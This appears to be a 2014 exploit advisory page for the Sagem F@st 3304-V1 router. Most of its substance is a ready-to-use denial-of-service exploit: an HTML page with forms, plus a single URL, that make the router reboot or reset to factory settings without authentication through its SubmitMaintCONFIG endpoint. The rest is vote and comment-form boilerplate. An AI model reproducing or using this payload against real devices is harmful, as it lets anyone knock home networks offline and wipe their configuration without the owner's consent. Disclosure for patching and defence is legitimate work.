Sagem F@st 3304-V1 denial of service Vulnerability

2014.07.28

Credit: Z3ro0ne

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Title : Sagem F@st 3304-V1 denial of service Vulnerability
# Vendor Homepage : http://www.sagemcom.com
# Tested on : Firefox, Google Chrome
# Tested Router : Sagem F@st 3304-V1
# Date : 2014-07-26
# Author : Z3ro0ne
# Contact : saadousfar59@gmail.com
# Facebook Page : https://www.facebook.com/Z3ro0ne
# Vulnerability description :
the Vulnerability allow unauthenticated users to remotely restart and reset the router
# Exploit:
<html>
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
<body>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
</FORM>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
<INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
</FORM>
</body>
</html>
Reset to factory configuration :
--- Using Google Chrome browser :
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Sagem F@st 3304-V1 denial of service Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.